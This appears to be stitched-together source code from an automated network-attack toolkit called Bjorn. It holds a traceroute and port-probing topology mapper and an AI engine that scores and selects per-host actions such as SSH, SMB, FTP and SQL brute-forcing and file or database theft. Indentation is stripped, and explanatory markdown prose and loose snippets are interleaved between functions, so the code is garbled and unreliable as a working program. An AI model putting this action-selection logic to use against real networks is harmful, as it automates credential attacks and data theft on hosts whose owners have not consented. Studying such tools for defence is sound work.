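        if k not in seen:
            seen.add(k)
            out.append(e)
    return out
```

This is the same first-wins rule Phase 4 applies when merging new edges into the aggregate.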
# -------------------- Main Action Class --------------------
class YggdrasilMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
# ---- Phase 1: Traceroute ----
def _phase_traceroute(
self,
ip: str,
max_depth: int,
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> List[Dict[str, Any]]:
"""Run traceroute to target. Returns list of hop dicts."""
logger.info(f"Phase 1: Traceroute to {ip} (max_depth={max_depth})")
if _SCAPY_AVAILABLE:
hops = _scapy_traceroute(ip, max_depth, probe_timeout)
else:
hops = _subprocess_traceroute(ip, max_depth, probe_timeout)
# Progress: phase 1 is 0-30% (weight = 30% of total_steps)
phase1_steps = max(1, int(total_steps * 0.30))
progress.advance(phase1_steps)
logger.info(f"Traceroute to {ip}: {len(hops)} hop(s) discovered")
return hops
# ---- Phase 2: Service Enrichment ----
def _phase_enrich(
self,
ip: str,
mac: str,
row: Dict[str, Any],
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Enrich the target node with port / service data from the DB and
optional TCP connect probes.
"""
logger.info(f"Phase 2: Service enrichment for {ip}")
node_info: Dict[str, Any] = {
"ip": ip,
"mac": mac,
"hostname": "",
"open_ports": [],
"verified_ports": {},
"vendor": "",
}
# Read hostname
hostname = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
if not hostname:
hostname = _reverse_dns(ip)
node_info["hostname"] = hostname
# Query DB for known ports to prioritize probing
db_ports = []
host_data = None  # initialized here so the vendor fallback below cannot raise NameError if the DB query fails
try:
# mac is available in the scope
host_data = self.shared_data.db.get_host_by_mac(mac)
if host_data and host_data.get("ports"):
# Normalize ports from DB string
db_ports = [int(p) for p in str(host_data["ports"]).split(";") if p.strip().isdigit()]
except Exception as e:
logger.debug(f"Failed to query DB for host ports: {e}")
# Fallback to defaults if DB is empty
if not db_ports:
# Read existing ports from DB row (compatibility)
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
db_ports.append(int(p))
node_info["open_ports"] = sorted(set(db_ports))
# Vendor and OS guessing
vendor = str(row.get("Vendor") or row.get("vendor") or "").strip()
if not vendor and host_data:
vendor = host_data.get("vendor", "")
node_info["vendor"] = vendor
# OS guessing is out of scope for this action; only the data gathered above is stored.
# Verify a small set of key ports via TCP connect
verified: Dict[str, Dict[str, Any]] = {}
# Prioritize ports we found in DB + a few common ones
probe_candidates = sorted(set(db_ports + _VERIFY_PORTS))[:10]
for port in probe_candidates:
if self.shared_data.orchestrator_should_exit:
break
is_open, rtt = _tcp_probe(ip, port, probe_timeout)
if is_open:
verified[str(port)] = {"open": is_open, "rtt_ms": rtt}
# Update node_info open_ports if we found a new one
if port not in node_info["open_ports"]:
node_info["open_ports"].append(port)
node_info["open_ports"].sort()
node_info["verified_ports"] = verified
# Progress: phase 2 is 30-60%
phase2_steps = max(1, int(total_steps * 0.30))
progress.advance(phase2_steps)
self.shared_data.log_milestone(b_class, "Enrichment", f"Discovered {len(node_info['open_ports'])} ports for {ip}")
return node_info
# ---- Phase 3: Build Topology ----
def _phase_build_topology(
self,
ip: str,
hops: List[Dict[str, Any]],
target_node: Dict[str, Any],
progress: ProgressTracker,
total_steps: int,
) -> Tuple[Dict[str, Dict[str, Any]], List[Dict[str, Any]]]:
"""
Build nodes dict and edges list from traceroute hops and target enrichment.
"""
logger.info(f"Phase 3: Building topology graph for {ip}")
nodes: Dict[str, Dict[str, Any]] = {}
edges: List[Dict[str, Any]] = []
# Add target node
nodes[ip] = {
"ip": ip,
"type": "target",
"hostname": target_node.get("hostname", ""),
"mac": target_node.get("mac", ""),
"vendor": target_node.get("vendor", ""),
"open_ports": target_node.get("open_ports", []),
"verified_ports": target_node.get("verified_ports", {}),
"rtt_ms": 0,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
# Add hop nodes and edges
prev_ip: Optional[str] = None
for hop in hops:
hop_ip = hop.get("ip", "*")
hop_rtt = hop.get("rtt_ms", 0)
hop_num = hop.get("hop", 0)
if hop_ip == "*":
# Unknown hop -- still create a placeholder node
placeholder = f"*_hop{hop_num}"
nodes[placeholder] = {
"ip": placeholder,
"type": "unknown_hop",
"hostname": "",
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": 0,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": placeholder,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = placeholder
continue
# Real hop IP
if hop_ip not in nodes:
hop_hostname = _reverse_dns(hop_ip)
nodes[hop_ip] = {
"ip": hop_ip,
"type": "router" if hop_ip != ip else "target",
"hostname": hop_hostname,
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": hop_rtt,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
else:
# Update RTT if this hop is lower
existing_rtt = nodes[hop_ip].get("rtt_ms") or 0
if existing_rtt == 0 or (hop_rtt > 0 and hop_rtt < existing_rtt):
nodes[hop_ip]["rtt_ms"] = hop_rtt
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": hop_ip,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = hop_ip
# Progress: phase 3 is 60-80% (weight = 20% of total_steps)
phase3_steps = max(1, int(total_steps * 0.20))
progress.advance(phase3_steps)
logger.info(f"Topology for {ip}: {len(nodes)} node(s), {len(edges)} edge(s)")
return nodes, edges
# ---- Phase 4: Aggregate ----
def _phase_aggregate(
self,
new_nodes: Dict[str, Dict[str, Any]],
new_edges: List[Dict[str, Any]],
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Merge new topology data with previous runs.
"""
logger.info("Phase 4: Aggregating topology data")
topology = _load_existing_topology(OUTPUT_DIR)
# Merge nodes
existing_nodes = topology.get("nodes") or {}
if not isinstance(existing_nodes, dict):
existing_nodes = {}
for node_id, node_data in new_nodes.items():
if node_id in existing_nodes:
existing_nodes[node_id] = _merge_node(existing_nodes[node_id], node_data)
else:
existing_nodes[node_id] = node_data
topology["nodes"] = existing_nodes
# Merge edges (deduplicate by canonical key)
existing_edges = topology.get("edges") or []
if not isinstance(existing_edges, list):
existing_edges = []
seen_keys: set = set()
merged_edges: List[Dict[str, Any]] = []
for edge in existing_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
for edge in new_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
topology["edges"] = merged_edges
# Update metadata
meta = topology.get("metadata") or {}
meta["updated"] = datetime.utcnow().isoformat() + "Z"
meta["run_count"] = int(meta.get("run_count") or 0) + 1
meta["node_count"] = len(existing_nodes)
meta["edge_count"] = len(merged_edges)
topology["metadata"] = meta
topology["version"] = b_version
# Progress: phase 4 is 80-95% (weight = 15% of total_steps)
phase4_steps = max(1, int(total_steps * 0.15))
progress.advance(phase4_steps)
logger.info(
f"Aggregated topology: {meta['node_count']} node(s), "
f"{meta['edge_count']} edge(s), run #{meta['run_count']}"
)
return topology
# ---- Phase 5: Save ----
def _phase_save(
self,
topology: Dict[str, Any],
ip: str,
progress: ProgressTracker,
total_steps: int,
) -> str:
"""
Save topology JSON to disk. Returns the file path written.
"""
logger.info("Phase 5: Saving topology data")
os.makedirs(OUTPUT_DIR, exist_ok=True)
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H-%M-%SZ")
# Per-target snapshot
snapshot_name = f"topology_{ip.replace('.', '_')}_{timestamp}.json"
snapshot_path = os.path.join(OUTPUT_DIR, snapshot_name)
# Aggregated file (timestamped; _load_existing_topology selects the most recent by mtime)
aggregate_name = f"topology_aggregate_{timestamp}.json"
aggregate_path = os.path.join(OUTPUT_DIR, aggregate_name)
try:
with open(snapshot_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Snapshot saved: {snapshot_path}")
except Exception as exc:
logger.error(f"Failed to write snapshot {snapshot_path}: {exc}")
try:
with open(aggregate_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Aggregate saved: {aggregate_path}")
except Exception as exc:
logger.error(f"Failed to write aggregate {aggregate_path}: {exc}")
# Save Mermaid diagram
mermaid_path = os.path.join(OUTPUT_DIR, f"topology_{ip.replace('.', '_')}_{timestamp}.mermaid")
try:
mermaid_str = _generate_mermaid_topology(topology)
with open(mermaid_path, "w", encoding="utf-8") as fh:
fh.write(mermaid_str)
logger.info(f"Mermaid topology saved: {mermaid_path}")
except Exception as exc:
logger.error(f"Failed to write Mermaid topology: {exc}")
# Progress: phase 5 is 95-100% (weight = 5% of total_steps)
phase5_steps = max(1, int(total_steps * 0.05))
progress.advance(phase5_steps)
self.shared_data.log_milestone(b_class, "Save", f"Topology saved for {ip}")
return aggregate_path
# ---- Main execute ----
def execute(self, ip, port, row, status_key) -> str:
"""
Orchestrator entry point. Maps topology for a single target host.
Returns:
'success' -- topology data written successfully.
'failed' -- an error prevented meaningful output.
'interrupted' -- orchestrator requested early exit.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from DB row ---
mac = (
row.get("MAC Address")
or row.get("mac_address")
or row.get("mac")
or ""
).strip()
hostname = (
row.get("Hostname")
or row.get("hostname")
or row.get("hostnames")
or ""
).strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Configurable arguments ---
max_depth = int(getattr(self.shared_data, "yggdrasil_max_depth", 15))
probe_timeout = float(getattr(self.shared_data, "yggdrasil_probe_timeout", 2.0))
# Clamp to sane ranges
max_depth = max(5, min(max_depth, 30))
probe_timeout = max(1.0, min(probe_timeout, 5.0))
# --- UI status ---
self.shared_data.bjorn_orch_status = "yggdrasil_mapper"
self.shared_data.bjorn_status_text2 = f"{ip}"
self.shared_data.comment_params = {"ip": ip, "mac": mac, "phase": "init"}
# Total steps for progress (arbitrary units; phases will consume proportional slices)
total_steps = 100
progress = ProgressTracker(self.shared_data, total_steps)
try:
# ---- Phase 1: Traceroute (0-30%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.log_milestone(b_class, "Traceroute", f"Running trace to {ip}")
hops = self._phase_traceroute(ip, max_depth, probe_timeout, progress, total_steps)
# ---- Phase 2: Service Enrichment (30-60%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "enrich"}
target_node = self._phase_enrich(ip, mac, row, probe_timeout, progress, total_steps)
# ---- Phase 3: Build Topology (60-80%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "topology"}
new_nodes, new_edges = self._phase_build_topology(
ip, hops, target_node, progress, total_steps
)
# ---- Phase 4: Aggregate (80-95%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "aggregate"}
topology = self._phase_aggregate(new_nodes, new_edges, progress, total_steps)
# ---- Phase 5: Save (95-100%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "save"}
saved_path = self._phase_save(topology, ip, progress, total_steps)
# Final UI update
node_count = len(topology.get("nodes") or {})
edge_count = len(topology.get("edges") or [])
hop_count = len([h for h in hops if h.get("ip") != "*"])
self.shared_data.comment_params = {
"ip": ip,
"hops": str(hop_count),
"nodes": str(node_count),
"edges": str(edge_count),
"file": os.path.basename(saved_path),
}
progress.set_complete()
logger.info(
f"YggdrasilMapper complete for {ip}: "
f"{hop_count} hops, {node_count} nodes, {edge_count} edges"
)
return "success"
except Exception as exc:
logger.error(f"YggdrasilMapper failed for {ip}: {exc}", exc_info=True)
self.shared_data.comment_params = {"ip": ip, "error": str(exc)[:120]}
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="YggdrasilMapper (network topology mapper)")
parser.add_argument("--ip", required=True, help="Target IP to trace")
parser.add_argument("--max-depth", type=int, default=15, help="Max traceroute depth")
parser.add_argument("--timeout", type=float, default=2.0, help="Probe timeout in seconds")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so execute() picks them up
sd.yggdrasil_max_depth = args.max_depth
sd.yggdrasil_probe_timeout = args.timeout
mapper = YggdrasilMapper(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": "",
}
result = mapper.execute(args.ip, None, row, "yggdrasil_mapper")
print(f"Result: {result}")
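The merge rules applied by `_merge_node` during Phase 4 (union of open ports, lowest non-zero RTT, newer non-empty scalars win) can be sketched standalone:

```python
def merge_node(existing: dict, new: dict) -> dict:
    """Merge two node dicts using the same precedence rules as _merge_node."""
    merged = dict(existing)
    for key, val in new.items():
        if val in (None, "", []):
            continue  # never overwrite with an empty value
        if key == "open_ports":
            ports = set(merged.get("open_ports") or [])
            ports.update(val)
            merged["open_ports"] = sorted(ports)
        elif key == "rtt_ms":
            old = merged.get("rtt_ms") or 0
            # keep the lowest non-zero RTT observed across runs
            merged["rtt_ms"] = val if old == 0 else (min(old, val) if val > 0 else old)
        else:
            merged[key] = val
    return merged
```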

867
ai_engine.py Normal file
View File

@@ -0,0 +1,867 @@
"""
ai_engine.py - Dynamic AI Decision Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Lightweight AI decision engine for Raspberry Pi Zero.
Works in tandem with deep learning model trained on external PC.
Architecture:
- Lightweight inference engine (no TensorFlow/PyTorch on Pi)
- Loads pre-trained model weights from PC
- Real-time action selection
- Automatic feature extraction
- Fallback to heuristics when model unavailable
Model Pipeline:
1. Pi: Collect data → Export → Transfer to PC
2. PC: Train deep neural network → Export lightweight model
3. Pi: Load model → Use for decision making
4. Repeat: Continuous learning cycle
Author: Bjorn Team
Version: 2.0.0
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="ai_engine.py", level=20)
class BjornAIEngine:
"""
Dynamic AI engine for action selection and prioritization.
Uses pre-trained model from external PC or falls back to heuristics.
"""
def __init__(self, shared_data, model_dir: str = None):
"""
Initialize AI engine
"""
self.shared_data = shared_data
self.db = shared_data.db
if model_dir is None:
self.model_dir = Path(getattr(shared_data, 'ai_models_dir', '/home/bjorn/ai_models'))
else:
self.model_dir = Path(model_dir)
self.model_dir.mkdir(parents=True, exist_ok=True)
# Model state
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self.last_server_attempted = False
self.last_server_contact_ok = None
# Try to load latest model
self._load_latest_model()
# Fallback heuristics (always available)
self._init_heuristics()
logger.info(
f"AI Engine initialized (model_loaded={self.model_loaded}, "
f"heuristics_available=True)"
)
# ═══════════════════════════════════════════════════════════════════════
# MODEL LOADING
# ═══════════════════════════════════════════════════════════════════════
def _load_latest_model(self):
"""Load the most recent model from model directory"""
try:
# Find all potential model configs
all_json_files = [f for f in self.model_dir.glob("bjorn_model_*.json")
if "_weights.json" not in f.name]
# 1. Filter for files that have matching weights
valid_models = []
for f in all_json_files:
weights_path = f.with_name(f.stem + '_weights.json')
if weights_path.exists():
valid_models.append(f)
else:
logger.debug(f"Skipping model {f.name}: Weights file missing")
if not valid_models:
logger.info(f"No complete models found in {self.model_dir}. Checking server...")
# Try to download from server
if self.check_for_updates():
return
logger.info_throttled(
"No AI model available (server offline or empty). Using heuristics only.",
key="ai_no_model_available",
interval_s=600.0,
)
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
self.model_loaded = True
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self._load_latest_model()
return self.model_loaded
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
self.last_server_contact_ok = None
try:
import requests
import os
except ImportError:
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
return False
try:
logger.debug(f"Checking AI Server for updates at {url}/model/latest")
from ai_utils import get_system_mac
params = {'mac_addr': get_system_mac()}
self.last_server_attempted = True
resp = requests.get(f"{url}/model/latest", params=params, timeout=5)
# Any HTTP response means server is reachable.
self.last_server_contact_ok = True
if resp.status_code != 200:
return False
remote_config = resp.json()
remote_version = str(remote_config.get("version", "")).strip()
if not remote_version:
return False
current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"
if remote_version > current_version:
logger.info(f"New model available: {remote_version} (Local: {current_version})")
# Download config (stream to avoid loading the whole file into RAM)
r_conf = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}.json",
stream=True, timeout=15,
)
if r_conf.status_code == 200:
conf_path = self.model_dir / f"bjorn_model_{remote_version}.json"
with open(conf_path, 'wb') as f:
for chunk in r_conf.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
else:
logger.info_throttled(
f"AI model download skipped (config HTTP {r_conf.status_code})",
key=f"ai_model_dl_conf_{r_conf.status_code}",
interval_s=300.0,
)
return False
# Download weights (stream to avoid loading the whole file into RAM)
r_weights = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}_weights.json",
stream=True, timeout=30,
)
if r_weights.status_code == 200:
weights_path = self.model_dir / f"bjorn_model_{remote_version}_weights.json"
with open(weights_path, 'wb') as f:
for chunk in r_weights.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
logger.success(f"Downloaded model {remote_version} files to Pi.")
else:
logger.info_throttled(
f"AI model download skipped (weights HTTP {r_weights.status_code})",
key=f"ai_model_dl_weights_{r_weights.status_code}",
interval_s=300.0,
)
return False
# Reload explicitly
return self.reload_model()
logger.debug(f"Server model ({remote_version}) is not newer than local ({current_version})")
return False
except Exception as e:
self.last_server_attempted = True
self.last_server_contact_ok = False
# Server may be offline; avoid spamming errors in AI mode.
logger.info_throttled(
f"AI server unavailable for model update check: {e}",
key="ai_model_update_check_failed",
interval_s=300.0,
)
return False
# ═══════════════════════════════════════════════════════════════════════
# DECISION MAKING
# ═══════════════════════════════════════════════════════════════════════
def choose_action(
self,
host_context: Dict[str, Any],
available_actions: List[str],
exploration_rate: float = None
) -> Tuple[str, float, Dict[str, Any]]:
"""
Choose the best action for a given host.
Args:
host_context: Dict with host information (mac, ports, hostname, etc.)
available_actions: List of action names that can be executed
exploration_rate: Probability of random exploration (0.0-1.0)
Returns:
Tuple of (action_name, confidence_score, debug_info)
"""
if exploration_rate is None:
exploration_rate = float(getattr(self.shared_data, "ai_exploration_rate", 0.1))
try:
# Exploration: random action
if exploration_rate > 0 and np.random.random() < exploration_rate:
import random
action = random.choice(available_actions)
return action, 0.0, {'method': 'exploration', 'exploration_rate': exploration_rate}
# If model is loaded, use it for prediction
if self.model_loaded and self.model_weights:
return self._predict_with_model(host_context, available_actions)
# Fallback to heuristics
return self._predict_with_heuristics(host_context, available_actions)
except Exception as e:
logger.error(f"Error choosing action: {e}")
# Ultimate fallback: first available action
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'no_actions', 'error': 'No available actions'}
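The exploration/exploitation split in `choose_action()` can be sketched standalone. This is a minimal epsilon-greedy selector; the function name and score dict are illustrative, not part of the engine's API:

```python
import random

def epsilon_greedy(scores, epsilon, rng=random):
    """Pick a random action with probability epsilon, else the best-scored one.

    `scores` maps action name -> model/heuristic score.
    """
    actions = list(scores)
    if not actions:
        return None
    if epsilon > 0 and rng.random() < epsilon:
        return rng.choice(actions)       # explore: uniform random pick
    return max(actions, key=scores.get)  # exploit: argmax over scores

# With epsilon=0 the choice is deterministic:
best = epsilon_greedy({'SSHBruteforce': 0.7, 'WebEnumeration': 0.4}, epsilon=0.0)
```

With `epsilon=0.1` (the engine's default `ai_exploration_rate`), roughly one decision in ten is random, which keeps fresh training samples flowing for actions the model currently under-rates.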
def _predict_with_model(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use loaded neural network model for prediction.
Dynamically maps extracted features to model manifest.
"""
try:
from ai_utils import extract_neural_features_dict
# 1. Get model feature manifest
manifest = self.model_config.get('architecture', {}).get('feature_names', [])
if not manifest:
# Legacy fallback
return self._predict_with_model_legacy(host_context, available_actions)
# 2. Extract host-level features
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
host_data = self._get_host_context_from_db(mac, host)
net_data = self._get_network_context()
temp_data_base = self._get_temporal_context(mac) # MAC-level temporal, called once
best_action = None
best_score = -1.0
all_scores = {}
# 3. Score each action
for action in available_actions:
action_data = self._get_action_context(action, host, mac)
# Merge action-level temporal overrides into temporal context copy
temp_data = dict(temp_data_base)
temp_data['same_action_attempts'] = action_data.pop('same_action_attempts', 0)
temp_data['is_retry'] = action_data.pop('is_retry', False)
# Extract all known features into a dict
features_dict = extract_neural_features_dict(
host_features=host_data,
network_features=net_data,
temporal_features=temp_data,
action_features=action_data
)
# Dynamic mapping: Pull features requested by model manifest
# Defaults to 0.0 if the Pi doesn't know this feature yet
input_vector = np.array([float(features_dict.get(name, 0.0)) for name in manifest], dtype=float)
# Neural inference (supports variable hidden depth from exported model).
z_out = self._forward_network(input_vector)
z_out = np.array(z_out).reshape(-1)
if z_out.size == 1:
# Binary classifier exported with 1-neuron sigmoid output.
score = float(self._sigmoid(z_out[0]))
else:
probs = self._softmax(z_out)
score = float(probs[1] if len(probs) > 1 else probs[0])
all_scores[action] = score
if score > best_score:
best_score = score
best_action = action
if best_action is None:
return self._predict_with_heuristics(host_context, available_actions)
# Capture the last input vector (for visualization).
# Note: this is the vector from the final loop iteration, not necessarily
# the best action's; vectors differ only in their action-specific features.
debug_info = {
'method': 'neural_network_v3',
'model_version': self.model_config.get('version'),
'feature_count': len(manifest),
'all_scores': all_scores,
# Convert numpy ndarray → plain Python list so debug_info is
# always JSON-serialisable (scheduler stores it in action_queue metadata).
'input_vector': input_vector.tolist(),
}
return best_action, float(best_score), debug_info
except Exception as e:
logger.error(f"Dynamic model prediction failed: {e}")
import traceback
logger.debug(traceback.format_exc())
return self._predict_with_heuristics(host_context, available_actions)
def _predict_with_model_legacy(self, host_context: Dict[str, Any], available_actions: List[str]) -> Tuple[str, float, Dict[str, Any]]:
"""Fallback for models without feature_names manifest (fixed length 56)"""
# ... very similar to previous v2 but using hardcoded list ...
return self._predict_with_heuristics(host_context, available_actions)
def _get_host_context_from_db(self, mac: str, host: Dict) -> Dict:
"""Helper to collect host features from DB"""
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
vendor = host.get('vendor', '')
# Calculate age
age_hours = 0.0
if host.get('first_seen'):
from datetime import datetime
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
age_hours = (datetime.now() - first_seen).total_seconds() / 3600
except Exception: pass
creds = self._get_credentials_for_host(mac)
return {
'port_count': len(ports),
'service_count': len(self._get_services_for_host(mac)),
'ip_count': len([ip for ip in (host.get('ips') or '').split(';') if ip.strip()]),
'credential_count': len(creds),
'age_hours': round(age_hours, 2),
'has_ssh': 22 in ports,
'has_http': 80 in ports or 8080 in ports,
'has_https': 443 in ports,
'has_smb': 445 in ports,
'has_rdp': 3389 in ports,
'has_database': any(p in ports for p in [3306, 5432, 1433]),
'has_credentials': len(creds) > 0,
'is_new': age_hours < 24,
'is_private': True, # Simple assumption for now
'has_multiple_ips': len([ip for ip in (host.get('ips') or '').split(';') if ip.strip()]) > 1,
'vendor_category': self._categorize_vendor(vendor),
'port_profile': self._detect_port_profile(ports)
}
def _get_network_context(self) -> Dict:
"""Collect real network-wide stats from DB (called once per choose_action)."""
try:
all_hosts = self.db.get_all_hosts()
total = len(all_hosts)
# Subnet diversity
subnets = set()
active = 0
for h in all_hosts:
ips = (h.get('ips') or '').split(';')
for ip in ips:
ip = ip.strip()
if ip:
subnets.add('.'.join(ip.split('.')[:3]))
break
if h.get('alive'):
active += 1
return {
'total_hosts': total,
'subnet_count': len(subnets),
'similar_vendor_count': 0, # filled by caller if needed
'similar_port_profile_count': 0, # filled by caller if needed
'active_host_ratio': round(active / total, 2) if total else 0.0,
}
except Exception as e:
logger.error(f"Error collecting network context: {e}")
return {
'total_hosts': 0, 'subnet_count': 1,
'similar_vendor_count': 0, 'similar_port_profile_count': 0,
'active_host_ratio': 1.0,
}
def _get_temporal_context(self, mac: str) -> Dict:
"""
Collect real temporal features for a MAC from DB.
same_action_attempts / is_retry are action-specific — they are NOT
included here; instead they are merged from _get_action_context()
inside the per-action loop in _predict_with_model().
"""
from datetime import datetime
now = datetime.now()
ctx = {
'hour_of_day': now.hour,
'day_of_week': now.weekday(),
'is_weekend': now.weekday() >= 5,
'is_night': now.hour < 6 or now.hour >= 22,
'previous_action_count': 0,
'seconds_since_last': 0,
'historical_success_rate': 0.0,
'same_action_attempts': 0, # placeholder; overwritten per-action
'is_retry': False, # placeholder; overwritten per-action
'global_success_rate': 0.0,
'hours_since_discovery': 0,
}
try:
# Per-host stats from ml_features (persistent training log)
rows = self.db.query(
"""
SELECT
COUNT(*) AS cnt,
AVG(CAST(success AS REAL)) AS success_rate,
MAX(timestamp) AS last_ts
FROM ml_features
WHERE mac_address = ?
""",
(mac,),
)
if rows and rows[0]['cnt']:
ctx['previous_action_count'] = int(rows[0]['cnt'])
ctx['historical_success_rate'] = round(float(rows[0]['success_rate'] or 0.0), 2)
if rows[0]['last_ts']:
try:
last_dt = datetime.fromisoformat(str(rows[0]['last_ts']))
ctx['seconds_since_last'] = round(
(now - last_dt).total_seconds(), 1
)
except Exception:
pass
# Global success rate (all hosts)
g = self.db.query(
"SELECT AVG(CAST(success AS REAL)) AS gsr FROM ml_features"
)
if g and g[0]['gsr'] is not None:
ctx['global_success_rate'] = round(float(g[0]['gsr']), 2)
# Hours since host first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
ctx['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception:
pass
except Exception as e:
logger.error(f"Error collecting temporal context for {mac}: {e}")
return ctx
# Action-specific temporal fields populated by _get_action_context
_ACTION_PORTS = {
'SSHBruteforce': 22, 'SSHEnumeration': 22, 'StealFilesSSH': 22,
'WebEnumeration': 80, 'WebVulnScan': 80, 'WebLoginProfiler': 80,
'WebSurfaceMapper': 80,
'SMBBruteforce': 445, 'StealFilesSMB': 445,
'FTPBruteforce': 21, 'StealFilesFTP': 21,
'TelnetBruteforce': 23, 'StealFilesTelnet': 23,
'SQLBruteforce': 3306, 'StealDataSQL': 3306,
'NmapVulnScanner': 0, 'NetworkScanner': 0,
'RDPBruteforce': 3389,
}
def _get_action_context(self, action_name: str, host: Dict, mac: str = '') -> Dict:
"""
Collect action-specific features including per-action attempt history.
Merges action-type + target-port info with action-level temporal stats.
"""
action_type = self._classify_action_type(action_name)
target_port = self._ACTION_PORTS.get(action_name, 0)
# If port not in lookup, try to infer from action name
if target_port == 0:
name_lower = action_name.lower()
for svc, port in [('ssh', 22), ('http', 80), ('smb', 445), ('ftp', 21),
('telnet', 23), ('sql', 3306), ('rdp', 3389)]:
if svc in name_lower:
target_port = port
break
ctx = {
'action_type': action_type,
'target_port': target_port,
'is_standard_port': 0 < target_port < 1024,
# Action-level temporal (overrides placeholder in temporal_context)
'same_action_attempts': 0,
'is_retry': False,
}
if mac:
try:
r = self.db.query(
"""
SELECT COUNT(*) AS cnt
FROM ml_features
WHERE mac_address = ? AND action_name = ?
""",
(mac, action_name),
)
attempts = int(r[0]['cnt']) if r else 0
ctx['same_action_attempts'] = attempts
ctx['is_retry'] = attempts > 0
except Exception as e:
logger.debug(f"Action context DB query failed for {action_name}: {e}")
return ctx
def _classify_action_type(self, action_name: str) -> str:
"""Classify action name into a type"""
name = action_name.lower()
if 'brute' in name: return 'bruteforce'
if 'enum' in name or 'scan' in name: return 'enumeration'
if 'exploit' in name: return 'exploitation'
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
